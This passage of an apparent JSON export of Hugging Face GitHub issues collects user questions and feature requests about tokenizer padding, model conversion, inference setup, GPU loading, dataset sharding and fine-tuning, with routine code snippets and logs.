\r\n\r\nlabels_list = []\r\nfor i in range(len(datas)):\r\n input_ids = [tokenizer.bos_token_id] + model_input['input_ids'][i] + [tokenizer.eos_token_id] # add bos and eos token\r\n input_ids = input_ids + max(0, max_length-len(input_ids))*[tokenizer.eos_token_id] # add padding token\r\n attention_mask = [1] + model_input['attention_mask'][i] + [1] # attend to bos and eos tokens\r\n attention_mask = attention_mask + max(0, max_length - len(attention_mask)) * [0] # don't attend to padding tokens\r\n labels = [tokenizer.bos_token_id] + model_input['input_ids'][i] + [tokenizer.eos_token_id] # take loss on bos and eos\r\n labels = labels + max(0, max_length - len(labels)) * [-100] # padding doesn't take loss\r\n model_input['input_ids'][i] = input_ids\r\n model_input['attention_mask'][i] = attention_mask\r\n labels_list.append(labels)\r\n\r\nmodel_input['labels'] = labels_list\r\nprint('batch input:\\n', model_input)\r\n\r\n```\r\n\r\nPrinted output:\r\n```\r\noriginal input:\r\n {'input_ids': [[464, 3290, 13], [464, 13779, 3290, 13]], \r\n'attention_mask': [[1, 1, 1], [1, 1, 1, 1]]}\r\nbatch input:\r\n {'input_ids': [[50256, 464, 3290, 13, 50256, 50256, 50256, 50256], [50256, 464, 13779, 3290, 13, 50256, 50256, 50256]], \r\n'attention_mask': [[1, 1, 1, 1, 1, 0, 0, 0], [1, 1, 1, 1, 1, 1, 0, 0]], \r\n'labels': [[50256, 464, 3290, 13, 50256, -100, -100, -100], [50256, 464, 13779, 3290, 13, 50256, -100, -100]]}\r\n```\r\n\r\n\r\n### Expected behavior\r\n\r\nMy questions:\r\n1. Is the method I use to format the batch input correct?\r\n2. Why can't the gpt2 tokenizer auto-format batch input like the bert tokenizer does?\r\n3. In this pre-training [demo](https://huggingface.co/learn/nlp-course/en/chapter7/6?fw=pt#preparing-the-dataset), \r\n I found that it doesn't add bos and eos tokens, and adds the pad token only at the end of the sequence. \r\nSo I think at pre-training time one only needs to add the pad token to keep the sequence length consistent (for comparison, see the sketch below). 
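For comparison, a sketch of the same batch built with the tokenizer's own padding (reusing the `tokenizer`, `datas`, and `max_length` values from the snippet above):

```python
tokenizer.pad_token = tokenizer.eos_token  # GPT2 ships no pad token

texts = [tokenizer.bos_token + d + tokenizer.eos_token for d in datas]
# add truncation=True if inputs may exceed max_length
batch = tokenizer(texts, padding="max_length", max_length=max_length, return_tensors="pt")

labels = batch["input_ids"].clone()
labels[batch["attention_mask"] == 0] = -100  # no loss on padding
batch["labels"] = labels
```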
\r\nBut when it comes to fine-tuning, additional eos tokens need to be added, and eos needs take loss because the model needs to learn when to stop generating.\r\n Am I right?", "url": "https://github.com/huggingface/transformers/issues/28598", "state": "closed", "labels": [], "created_at": "2024-01-19T06:17:29Z", "updated_at": "2024-01-22T01:49:43Z", "user": "minmie" }, { "repo": "huggingface/transformers", "number": 28597, "title": "How to find or create the `model_state_dict.bin` file for the `convert_llava_weights_to_hf.py` script", "body": "Hi @younesbelkada,\r\n\r\nFollowing up on the [fix to the LLaVA convert script](https://github.com/huggingface/transformers/pull/28570) and thanks for all the help with the PR!\r\n\r\nI encountered some issue with the convert script and wanted to ask about the recommended way to create the `model_state_dict.bin` file specified here: https://github.com/huggingface/transformers/blob/772307be7649e1333a933cfaa229dc0dec2fd331/src/transformers/models/llava/convert_llava_weights_to_hf.py#L74\r\n\r\nIn order to create the `model_state_dict.bin` I tried something like the following with the original https://github.com/haotian-liu/LLaVA code:\r\n```python\r\nimport torch\r\nfrom llava.model.language_model.llava_llama import LlavaLlamaForCausalLM\r\n\r\n# load model\r\nkwargs = {\"device_map\": \"auto\", \"torch_dtype\": torch.float16}\r\nmodel = LlavaLlamaForCausalLM.from_pretrained(\"liuhaotian/llava-v1.5-7b\", low_cpu_mem_usage=True, **kwargs)\r\n\r\n# load vision tower\r\nmodel.get_vision_tower().load_model()\r\n\r\n# Save state dict\r\ntorch.save(model.state_dict(), \"tmp/hf_models/llava-v1.5-7b/model_state_dict.bin\")\r\n```\r\n\r\nIt works but when I used the convert script I had to make the following changes: \r\n* Remove keys that ended with `.inv_freq` (e.g. `language_model.model.layers.0.self_attn.rotary_emb.inv_freq`)\r\n* Comment out the update to the `model.config.vocab_size` and `model.config.text_config.vocab_size` with the `pad_shape` here: https://github.com/huggingface/transformers/blob/772307be7649e1333a933cfaa229dc0dec2fd331/src/transformers/models/llava/convert_llava_weights_to_hf.py#L96-L97 otherwise, when I would try to load the converted model, it will error with the following:\r\n ```python\r\n from transformers import AutoProcessor, LlavaForConditionalGeneration\r\n model_id = \"Shopify/llava-1.5-7b\"\r\n\r\n model = LlavaForConditionalGeneration.from_pretrained(\r\n model_id,\r\n torch_dtype=torch.float16,\r\n low_cpu_mem_usage=True,\r\n ).to(0)\r\n ```\r\n ```console\r\n ValueError: Trying to set a tensor of shape torch.Size([32064, 5120]) in \"weight\" (which has shape torch.Size([32128, 5120])), this look incorrect.\r\n ```\r\n\r\nAm I doing something wrong when I create the `model_state_dict.bin` file or am I missing something else?\r\n\r\nThanks again in advance.", "url": "https://github.com/huggingface/transformers/issues/28597", "state": "closed", "labels": [], "created_at": "2024-01-19T02:38:31Z", "updated_at": "2024-01-22T14:28:20Z", "user": "isaac-vidas" }, { "repo": "huggingface/chat-ui", "number": 708, "title": "Add support for other API endpoints", "body": "It would be nice if HuggingChat could be used locally, but calling other remote LLM endpoints other than OpenAI.\r\nFor instance, this could be mistral.ai 's API endpoints (same as OpenAI - only difference is model name), or a custom server configured for it.\r\n\r\nPerhaps just adding a variable in the .env file defining the server? 
This seems like an easy feature, I could try implementing it myself if I get the time to look a bit more into the code (for instance, figuring out where the model name can be change)\r\nhttps://github.com/huggingface/chat-ui/blob/ee47ff37fddb70f78d1ef8a293d8ed3fbcd24ff9/src/lib/server/endpoints/openai/endpointOai.ts#L13C1-L13C65", "url": "https://github.com/huggingface/chat-ui/issues/708", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-01-18T18:27:27Z", "updated_at": "2024-01-25T17:28:28Z", "comments": 4, "user": "fbarbe00" }, { "repo": "huggingface/text-generation-inference", "number": 1451, "title": "How to run text generation inference locally", "body": "### System Info\n\nI completed the steps for local installation of Text Generation Inference as in here: https://github.com/huggingface/text-generation-inference#local-install\r\nI did all the installation on my local Linux (WSL). The model endpoint that I want to draw inference from is on my EC2. (I trained Mistral 7b model).\r\nWhen I run `text-generation-launcher --env` , I get the following:\r\n\r\n```\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ text-generation-launcher --env\r\nerror: invalid value 'True' for '--disable-custom-kernels'\r\n [possible values: true, false]\r\n\r\n tip: a similar value exists: 'true'\r\n\r\nFor more information, try '--help'.\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ export DISABLE_CUSTOM_KERNELS=true\r\n(text-generation-inference) tammosta@SEA-1801247735:~/text-generation-inference$ text-generation-launcher --env\r\n2024-01-17T19:54:02.802338Z INFO text_generation_launcher: Runtime environment:\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.70.0\r\nCommit sha: 0eabc83541225979209ff7183b4b4442e47adf92\r\nDocker label: N/A\r\nnvidia-smi:\r\nN/A\r\n2024-01-17T19:54:02.802403Z INFO text_generation_launcher: Args { model_id: \"bigscience/bloom-560m\", revision: None, validation_workers: 2, sharded: None, num_shard: None, quantize: None, speculate: None, dtype: None, trust_remote_code: false, max_concurrent_requests: 128, max_best_of: 2, max_stop_sequences: 4, max_top_n_tokens: 5, max_input_length: 1024, max_total_tokens: 2048, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: None, max_waiting_tokens: 20, hostname: \"0.0.0.0\", port: 3000, shard_uds_path: \"/tmp/text-generation-server\", master_addr: \"localhost\", master_port: 29500, huggingface_hub_cache: None, weights_cache_override: None, disable_custom_kernels: true, cuda_memory_fraction: 1.0, rope_scaling: None, rope_factor: None, json_output: false, otlp_endpoint: None, cors_allow_origin: [], watermark_gamma: None, watermark_delta: None, ngrok: false, ngrok_authtoken: None, ngrok_edge: None, env: true }\r\n2024-01-17T19:54:02.802591Z INFO download: text_generation_launcher: Starting download process.\r\n2024-01-17T19:54:09.019117Z INFO text_generation_launcher: Download file: model.safetensors\r\n\r\n2024-01-17T19:54:51.649553Z INFO text_generation_launcher: Downloaded /home/tammosta/.cache/huggingface/hub/models--bigscience--bloom-560m/snapshots/ac2ae5fab2ce3f9f40dc79b5ca9f637430d24971/model.safetensors in 0:00:42.\r\n\r\n2024-01-17T19:54:51.649696Z INFO text_generation_launcher: Download: [1/1] -- ETA: 0\r\n\r\n2024-01-17T19:54:52.249742Z INFO download: text_generation_launcher: Successfully downloaded weights.\r\n2024-01-17T19:54:52.250108Z INFO shard-manager: text_generation_launcher: Starting shard 
rank=0\r\n2024-01-17T19:54:56.525795Z WARN text_generation_launcher: We're not using custom kernels.\r\n\r\n2024-01-17T19:54:56.534344Z WARN text_generation_launcher: Could not import Flash Attention enabled models: No module named 'vllm'\r\n\r\n2024-01-17T19:55:01.117291Z INFO text_generation_launcher: Server started at unix:///tmp/text-generation-server-0\r\n\r\n2024-01-17T19:55:01.167200Z INFO shard-manager: text_generation_launcher: Shard ready in 8.916023926s rank=0\r\n2024-01-17T19:55:01.265832Z INFO text_generation_launcher: Starting Webserver\r\n2024-01-17T19:55:01.366710Z INFO text_generation_router: router/src/main.rs:178: Using the Hugging Face API\r\n2024-01-17T19:55:01.366788Z INFO hf_hub: /home/tammosta/.cargo/registry/src/index.crates.io-6f17d22bba15001f/hf-hub-0.3.2/src/lib.rs:55: Token file not found \"/home/tammosta/.cache/huggingface/token\"\r\n2024-01-17T19:55:02.294337Z INFO text_generation_router: router/src/main.rs:416: Serving revision ac2ae5fab2ce3f9f40dc79b5ca9f637430d24971 of model bigscience/bloom-560m\r\n2024-01-17T19:55:02.294415Z INFO text_generation_router: router/src/main.rs:234: Using the Hugging Face API to retrieve tokenizer config\r\n2024-01-17T19:55:02.315279Z INFO text_generation_router: router/src/main.rs:277: Warming up model\r\n2024-01-17T19:55:46.211550Z ERROR shard-manager: text_generation_launcher: Shard complete standard error output:\r\n\r\n/home/tammosta/anaconda3/envs/text-generation-inference/lib/python3.9/site-packages/bitsandbytes/cextension.py:34: UserWarning: The installed version of bitsandbytes was compiled without GPU support. 8-bit optimizers, 8-bit multiplication, and GPU quantization are unavailable.\r\n warn(\"The installed version of bitsandbytes was compiled without GPU support. \"\r\nconfig.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 693/693 [00:00<00:00, 189kB/s]\r\ntokenizer_config.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 222/222 [00:00<00:00, 106kB/s]\r\ntokenizer.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 14.5M/14.5M [00:00<00:00, 23.4MB/s]\r\nspecial_tokens_map.json: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 85.0/85.0 [00:00<00:00, 34.9kB/s]\r\n/home/tammosta/text-generation-inference/server/text_generation_server/models/custom_modeling/bloom_modeling.py:882: FutureWarning: `position_ids` have no functionalit", "url": "https://github.com/huggingface/text-generation-inference/issues/1451", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-17T20:12:35Z", "updated_at": "2024-02-22T01:44:26Z", "user": "tamanna-mostafa" }, { "repo": "huggingface/diffusers", "number": 6614, "title": "How to train text_to_image with images which is resolution of 512x768 ?", "body": "I want to finetune the sd1.5 with 50k images, all the image is resolution of 512x768. 
But I got an error like this:\r\n\r\n`train_text_to_image.py:` error: argument --resolution: invalid int value: '[512,768]'`\r\n\r\nSo, how can I train text_to_image with images at a resolution of 512x768?", "url": "https://github.com/huggingface/diffusers/issues/6614", "state": "closed", "labels": [], "created_at": "2024-01-17T13:51:16Z", "updated_at": "2024-01-25T14:28:01Z", "user": "lingxuan630" }, { "repo": "huggingface/accelerate", "number": 2347, "title": "How to load model to specified GPU devices?", "body": "I'm trying a large model, LLaVA1.5.\r\n\r\nI know that if I set the parameter `device_map='auto'` in `LlavaMPTForCausalLM.from_pretrained`, the model will be loaded on all visible GPUs (FSDP).\r\n\r\nNow I hope to load LLaVA1.5 on some of the visible GPUs, still in the FSDP mode, and automatically decide the device_map like `device_map='auto'`. Note that the GPUs can be **arbitrarily assigned**, i.e. GPU 2, 3, 4, but not starting with GPU 0. \r\nI tried to achieve this by passing a `max_memory`, like\r\n`model = LlavaMPTForCausalLM.from_pretrained(model_path,device_map='auto', max_memory={2: 33271054336, 3: 33271054336, 4: 33271054336})`\r\n\r\nHowever, an error occurred\r\n![image](https://github.com/huggingface/accelerate/assets/46648807/85a2eafc-ac94-4122-aae3-9a105d631f96)\r\n\r\nI think the loop should be modified?\r\nOr are there any simpler ways to achieve my goal?", "url": "https://github.com/huggingface/accelerate/issues/2347", "state": "closed", "labels": [], "created_at": "2024-01-17T09:23:04Z", "updated_at": "2024-02-26T15:06:36Z", "user": "davidluciolu" }, { "repo": "huggingface/transformers", "number": 28546, "title": "How to use fp32 and qLora to fine-tune models", "body": "### System Info\n\nI'm using transformers version 4.32.0 and I want to fine-tune the Qwen/Qwen-VL-Chat-Int4 model, but my 1080ti GPU doesn't support fp16. When I want to use \"training_args.fp16 = False\" to modify the parameters, the error \"dataclasses.FrozenInstanceError: cannot assign to field fp16\" will be reported. I guess this parameter cannot be changed manually. 
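A minimal sketch of one possible workaround, under the assumption that the goal is simply a `TrainingArguments` instance with `fp16` disabled (this is not code from the Qwen script, and it assumes `dataclasses.replace` round-trips `TrainingArguments` cleanly in the version at hand):

```python
import dataclasses

from transformers import TrainingArguments

args = TrainingArguments(output_dir="out")  # fp16 defaults to False

# If the instance were frozen, `args.fp16 = False` would raise
# dataclasses.FrozenInstanceError; dataclasses.replace sidesteps the
# assignment by building a brand-new instance with the override applied.
args = dataclasses.replace(args, fp16=False)
print(args.fp16)  # False
```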
What should I do besides changing the GPU so that it can use fp16?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am using the fine-tuning code given by Qwen:\r\n```python\r\n parser = transformers.HfArgumentParser(\r\n (ModelArguments, DataArguments, TrainingArguments, LoraArguments)\r\n )\r\n (\r\n model_args,\r\n data_args,\r\n training_args,\r\n lora_args,\r\n ) = parser.parse_args_into_dataclasses()\r\n if getattr(training_args, 'deepspeed', None) and getattr(lora_args, 'q_lora', False):\r\n training_args.distributed_state.distributed_type = DistributedType.DEEPSPEED\r\n training_args.fp16 = False\r\n compute_dtype = (\r\n torch.float16\r\n if training_args.fp16\r\n else (torch.bfloat16 if training_args.bf16 else torch.float32)\r\n )\r\n\r\n local_rank = training_args.local_rank\r\n\r\n device_map = None\r\n world_size = int(os.environ.get(\"WORLD_SIZE\", 1))\r\n ddp = world_size != 1\r\n if lora_args.q_lora:\r\n device_map = {\"\": int(os.environ.get(\"LOCAL_RANK\") or 0)} if ddp else None\r\n if len(training_args.fsdp) > 0 or deepspeed.is_deepspeed_zero3_enabled():\r\n logging.warning(\r\n \"FSDP or ZeRO3 are incompatible with QLoRA.\"\r\n )\r\n\r\n # Set RoPE scaling factor\r\n config = transformers.AutoConfig.from_pretrained(\r\n model_args.model_name_or_path,\r\n cache_dir=training_args.cache_dir,\r\n trust_remote_code=True,\r\n )\r\n config.use_cache = False\r\n\r\n # Load model and tokenizer\r\n model = transformers.AutoModelForCausalLM.from_pretrained(\r\n model_args.model_name_or_path,\r\n config=config,\r\n cache_dir=training_args.cache_dir,\r\n device_map=device_map,\r\n trust_remote_code=True,\r\n quantization_config=GPTQConfig(\r\n bits=4, disable_exllama=True\r\n )\r\n if training_args.use_lora and lora_args.q_lora\r\n else None,\r\n )\r\n``` \n\n### Expected behavior\n\nI want a solution", "url": "https://github.com/huggingface/transformers/issues/28546", "state": "closed", "labels": [], "created_at": "2024-01-17T07:16:11Z", "updated_at": "2024-02-26T08:04:39Z", "user": "guoyunqingyue" }, { "repo": "huggingface/sentence-transformers", "number": 2416, "title": "How to specify class weights in model training?", "body": "I have a very imbalanced training dataset. Is there a way I could specify class weights (e.g., class 0: 0.1, class 1: 1) for cross encoder training? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2416", "state": "closed", "labels": [], "created_at": "2024-01-16T21:00:27Z", "updated_at": "2024-01-20T15:49:54Z", "user": "mucun1988" }, { "repo": "huggingface/chat-ui", "number": 697, "title": "Add streaming support for SageMaker endpoints", "body": "It would be nice to have support for streaming tokens from SageMaker. 
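The Python code sample that follows uses a `LineIterator` helper that is not defined in the snippet; a minimal sketch of such a helper, modeled on the AWS SageMaker streaming examples rather than taken from this thread:

```python
import io


class LineIterator:
    """Accumulates SageMaker response-stream chunks and yields complete lines."""

    def __init__(self, stream):
        self.byte_iterator = iter(stream)
        self.buffer = io.BytesIO()
        self.read_pos = 0

    def __iter__(self):
        return self

    def __next__(self):
        while True:
            self.buffer.seek(self.read_pos)
            line = self.buffer.readline()
            if line and line[-1:] == b"\n":
                self.read_pos += len(line)
                return line[:-1]
            # Pull the next event from the stream; StopIteration ends iteration.
            chunk = next(self.byte_iterator)
            if "PayloadPart" in chunk:
                self.buffer.seek(0, io.SEEK_END)
                self.buffer.write(chunk["PayloadPart"]["Bytes"])
```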
Here are some resources from my conversation with @philschmid \r\n\r\n### Code sample (Python Code)\r\n```\r\nbody = {\"inputs\": \"what is life\", \"parameters\": {\"max_new_tokens\":400}}\r\nresp = smr.invoke_endpoint_with_response_stream(EndpointName=endpoint_name, Body=json.dumps(body), ContentType=\"application/json\")\r\nevent_stream = resp['Body']\r\n\r\nfor line in LineIterator(event_stream):\r\n resp = json.loads(line)\r\n print(resp.get(\"outputs\")[0], end='')\r\n```\r\n\r\n### Docs (JS)\r\nhttps://docs.aws.amazon.com/AWSJavaScriptSDK/v3/latest/client/sagemaker-runtime/command/InvokeEndpointWithResponseStreamCommand/", "url": "https://github.com/huggingface/chat-ui/issues/697", "state": "open", "labels": [ "enhancement", "back" ], "created_at": "2024-01-16T10:59:47Z", "updated_at": "2024-01-16T11:00:32Z", "comments": 0, "user": "nsarrazin" }, { "repo": "huggingface/transformers.js", "number": 522, "title": "Is it possible to fine-tune the hosted pretrained models?", "body": "### Question\r\nHello,\r\nIf we have a large dataset in our domain, can we use it to fine-tune the hosted pretrained models (for example: Xenova/nllb-200-distilled-600M) with optimum? Or is it possible to convert our own translation PyTorch model to ONNX so that it is compatible with transformers.js?", "url": "https://github.com/huggingface/transformers.js/issues/522", "state": "open", "labels": [ "question" ], "created_at": "2024-01-16T03:55:39Z", "updated_at": "2024-01-16T12:54:53Z", "user": "lhohoz" }, { "repo": "huggingface/datasets", "number": 6594, "title": "IterableDataset sharding logic needs improvement", "body": "### Describe the bug\r\n\r\nThe sharding of IterableDatasets with respect to distributed and dataloader worker processes appears problematic, with significant performance traps and inconsistencies between distributed train processes and worker processes.\r\n\r\nSplitting across num_workers (per train process loader processes) and world_size (distributed training processes) appears inconsistent.\r\n* worker split: https://github.com/huggingface/datasets/blob/9d6d16117a30ba345b0236407975f701c5b288d4/src/datasets/iterable_dataset.py#L1266-L1283\r\n* distributed split: https://github.com/huggingface/datasets/blob/9d6d16117a30ba345b0236407975f701c5b288d4/src/datasets/iterable_dataset.py#L1335-L1356\r\n\r\nIn the case of the distributed split, there is a modulus check that flips between two very different behaviours; why is this different from splitting across the data loader workers? For IterableDatasets the DataLoader worker processes are independent, so whether it's workers within one train process or across a distributed world, the shards should be distributed the same, across `world_size * num_worker` independent workers in either case... \r\n\r\nFurther, the fallback case when the `n_shards % world_size == 0` check fails is a rather extreme change. I argue it is not desirable to do that implicitly; it should be an explicit case for specific scenarios (i.e. reliable validation). A train scenario would likely be much better handled with improved wrapping / stopping behaviour to e.g. also fix #6437. Changing from stepping shards to stepping samples means that every single process reads ALL of the shards. 
This was never an intended default for sharded training; shards gain their performance advantage in large-scale distributed training by explicitly avoiding the need to have every process overlap in the data it reads. By default, only the data allocated to each process via its assigned shards should be read in each pass of the dataset.\r\n\r\nUsing a large-scale CLIP example, some of the larger datasets have 10-20k shards across 100+TB of data. Training with 1000 GPUs, we switch from reading 100 terabytes per epoch to 100 petabytes if we, say, drop one gpu-node and go from 20k % 1000 to 20k % 992.\r\n\r\nThe 'step over samples' case might be worth the overhead in specific validation scenarios where guarantees of at-least/most-once samples seen are more important, and do not make up a significant portion of train time or are done in smaller world sizes outside of train.\r\n\r\n### Steps to reproduce the bug\r\n\r\nN/A\r\n\r\n### Expected behavior\r\n\r\nWe have an iterable dataset with N shards; to split across workers:\r\n* shuffle shards (same seed across all train processes)\r\n* step shard iterator across distributed processes\r\n* step shard iterator across dataloader worker processes\r\n* shuffle samples in every worker via shuffle buffer (different seed in each worker, but ideally controllable, based on base seed + worker id + epoch)\r\n* end up with a (possibly uneven) number of shards per worker, but each shard only ever accessed by 1 worker per pass (epoch)\r\n\r\n\r\n\r\n### Environment info\r\n\r\nN/A", "url": "https://github.com/huggingface/datasets/issues/6594", "state": "open", "labels": [], "created_at": "2024-01-15T22:22:36Z", "updated_at": "2025-11-10T14:55:20Z", "comments": 7, "user": "rwightman" }, { "repo": "huggingface/alignment-handbook", "number": 103, "title": "Does QLora DPO Training support reference model?", "body": "Hello! Thanks for your awesome work!\r\n I met an issue when I run DPO with QLoRA. I notice there is a setting:\r\n```\r\n if model_args.use_peft is True:\r\n ref_model = None\r\n ref_model_kwargs = None\r\n```\r\nI also notice that `use_peft` is set to true only in config_qlora.yaml. This means that if we use QLoRA to do DPO training, we do not use a reference model at all. \r\nI wonder if this code supports QLoRA training with a reference model? Thanks!", "url": "https://github.com/huggingface/alignment-handbook/issues/103", "state": "open", "labels": [], "created_at": "2024-01-15T09:22:32Z", "updated_at": "2024-01-15T09:27:08Z", "comments": 0, "user": "Harry-mic" }, { "repo": "huggingface/swift-coreml-diffusers", "number": 91, "title": "How to import new .SAFETENSORS model?", "body": "How can I import a safetensors-formatted model into the diffusers app?\r\n\r\nI tried copying the safetensors file to the folder loaded by the dropdown menu. But when I relaunch the app, it doesn't show the new model in the menu.", "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/91", "state": "open", "labels": [], "created_at": "2024-01-15T08:24:53Z", "updated_at": "2024-07-07T09:03:27Z", "user": "mcandre" }, { "repo": "huggingface/candle", "number": 1585, "title": "Extension request: How to construct Tensor for n-dimensional Vec", "body": "How do I best create a Tensor from a nested &Vec<Vec<…>> type? Everything above 1D is quite hard to manage for index-based value setting. 
", "url": "https://github.com/huggingface/candle/issues/1585", "state": "closed", "labels": [], "created_at": "2024-01-14T17:46:57Z", "updated_at": "2025-11-23T20:22:09Z", "user": "BDUG" }, { "repo": "huggingface/nanotron", "number": 21, "title": "Save checkpoint before terminating the training run", "body": "Why don't we save a model checkpoint before terminating the training run? [[link]](https://github.com/huggingface/nanotron/blob/fd99571e3769cb1876d5c9d698b512e85a6e4896/src/nanotron/trainer.py#L429)\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/nanotron/issues/21", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-13T11:28:20Z", "updated_at": "2024-01-13T11:28:54Z", "user": "xrsrke" }, { "repo": "huggingface/accelerate", "number": 2331, "title": "How to share non-tensor data between processes?", "body": "I am running a training on 2 GPUs on the same machine. I need a way to share some float values and maybe dicts between the two processes. I saw that there is a `gather` method, but this only works for tensors.\r\n\r\nIs there any way to do inter-process communication that is not directly related to the training?\r\n\r\nEDIT: What I want to do is log the AVERAGE training error of my model after each epoch. The problem is that the process I am logging from only sees the training error that was computed in this process", "url": "https://github.com/huggingface/accelerate/issues/2331", "state": "closed", "labels": [], "created_at": "2024-01-12T19:13:27Z", "updated_at": "2024-01-16T11:36:34Z", "user": "simonhessner" }, { "repo": "huggingface/transformers", "number": 28476, "title": "How to avoid the peak RAM memory usage of a model when I want to load to GPU", "body": "### System Info\n\n- `transformers` version: 4.36.2\r\n- Platform: Linux-5.10.201-191.748.amzn2.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.20.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.26.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.1.0 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\n\n### Who can help?\n\nI am using transformers to load a model into GPU, and I observed that before moving the model to GPU there is a peak of RAM usage that later gets unused. 
I assume the model is loaded on the CPU before moving to the GPU.\r\n\r\nOn the GPU the model takes around 4Gi, and to load it I need more than 7Gi of RAM, which seems weird.\r\n\r\nIs there a way to load it directly to the GPU without spending so much RAM?\r\n\r\nI have tried with `low_cpu_mem_usage` and the `device_map` parameter set to `cuda` and `auto`, but no luck.\r\n\r\n```python\r\nfrom transformers import AutoModel; m = AutoModel.from_pretrained(\"jinaai/jina-embeddings-v2-base-en\", trust_remote_code=True, low_cpu_mem_usage=True, device_map=\"auto\")\r\n``` \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\r\nfrom transformers import AutoModel; m = AutoModel.from_pretrained(\"jinaai/jina-embeddings-v2-base-en\", trust_remote_code=True, low_cpu_mem_usage=True, device_map=\"auto\")\r\n```\n\n### Expected behavior\n\nNot having such a memory peak", "url": "https://github.com/huggingface/transformers/issues/28476", "state": "closed", "labels": [], "created_at": "2024-01-12T11:39:52Z", "updated_at": "2024-02-12T08:08:17Z", "user": "JoanFM" }, { "repo": "huggingface/datasets", "number": 6584, "title": "np.fromfile not supported", "body": "How can I wrap np.fromfile to use it like np.load?\r\n\r\n\r\n```python\r\ndef xnumpy_fromfile(filepath_or_buffer, *args, download_config: Optional[DownloadConfig] = None, **kwargs):\r\n import numpy as np\r\n\r\n if hasattr(filepath_or_buffer, \"read\"):\r\n return np.fromfile(filepath_or_buffer, *args, **kwargs)\r\n else:\r\n filepath_or_buffer = str(filepath_or_buffer)\r\n return np.fromfile(xopen(filepath_or_buffer, \"rb\", download_config=download_config).read(), *args, **kwargs)\r\n```\r\nThis does not work.\r\n", "url": "https://github.com/huggingface/datasets/issues/6584", "state": "open", "labels": [], "created_at": "2024-01-12T09:46:17Z", "updated_at": "2024-01-15T05:20:50Z", "comments": 6, "user": "d710055071" }, { "repo": "huggingface/distil-whisper", "number": 73, "title": "I want to confirm how the knowledge organization is implemented\uff1f", "body": "I don't quite understand how knowledge distillation is implemented here. \r\n\r\nWhisper is trained on 680,000 hours of untagged data for autoregression. According to the content of the fourth section of the paper, our model is trained on 21,170 hours of data with pseudo-labels generated by Whisper, with the first and 32nd layer parameters frozen based on Whisper. 
**This means that our model only needs to go through 21,170 hours of data with pseudo-labels and a model structure similar to Whisper, freezing the first and 32nd layers, using weighted KL divergence and label cross-entropy to achieve good results\uff1f**\r\n\r\nIf this is the case, it is indeed a significant discovery, indicating that we can always reduce the model's parameters and inference time after pre-training the model using similar methods, without significant loss of accuracy.\r\n\r\nThank you in advance", "url": "https://github.com/huggingface/distil-whisper/issues/73", "state": "open", "labels": [], "created_at": "2024-01-12T07:43:21Z", "updated_at": "2024-01-17T16:57:31Z", "user": "hxypqr" }, { "repo": "huggingface/transformers.js", "number": 516, "title": "How to access attentions matrix for MarianMT?", "body": "### Question\r\n\r\nHey, I've been trying to access the attentions output by the MarianMT like so (please excuse the unorthodox config argument, tidying up is next on my todo list):\r\n\r\n```\r\n const model_name = \"Xenova/opus-mt-en-fr\";\r\n const tokenizer = await MarianTokenizer.from_pretrained(model_name, {\r\n config: {\r\n output_hidden_states: true,\r\n output_attentions: true\r\n }\r\n })\r\n const tokens = (await tokenizer(text)).input_ids;\r\n const model = await MarianMTModel.from_pretrained(model_name, {\r\n config: {\r\n model_type: 'marian',\r\n is_encoder_decoder: true,\r\n _name_or_path: 'Helsinki-NLP/opus-mt-en-fr',\r\n _num_labels: 3,\r\n activation_dropout: 0,\r\n activation_function: 'swish',\r\n add_bias_logits: false,\r\n add_final_layer_norm: false,\r\n architectures: ['MarianMTModel'],\r\n attention_dropout: 0,\r\n bad_words_ids: [[Array]],\r\n bos_token_id: 0,\r\n classif_dropout: 0,\r\n classifier_dropout: 0,\r\n d_model: 512,\r\n decoder_attention_heads: 8,\r\n decoder_ffn_dim: 2048,\r\n decoder_layerdrop: 0,\r\n decoder_layers: 6,\r\n decoder_start_token_id: 59513,\r\n decoder_vocab_size: 59514,\r\n dropout: 0.1,\r\n encoder_attention_heads: 8,\r\n encoder_ffn_dim: 2048,\r\n encoder_layerdrop: 0,\r\n encoder_layers: 6,\r\n eos_token_id: 0,\r\n forced_eos_token_id: 0,\r\n gradient_checkpointing: false,\r\n id2label: { '0': 'LABEL_0', '1': 'LABEL_1', '2': 'LABEL_2' },\r\n init_std: 0.02,\r\n label2id: { LABEL_0: 0, LABEL_1: 1, LABEL_2: 2 },\r\n max_length: 512,\r\n max_position_embeddings: 512,\r\n normalize_before: false,\r\n normalize_embedding: false,\r\n num_beams: 4,\r\n num_hidden_layers: 6,\r\n pad_token_id: 59513,\r\n scale_embedding: true,\r\n share_encoder_decoder_embeddings: true,\r\n static_position_embeddings: true,\r\n transformers_version: '4.34.0.dev0',\r\n use_cache: true,\r\n vocab_size: 59514,\r\n 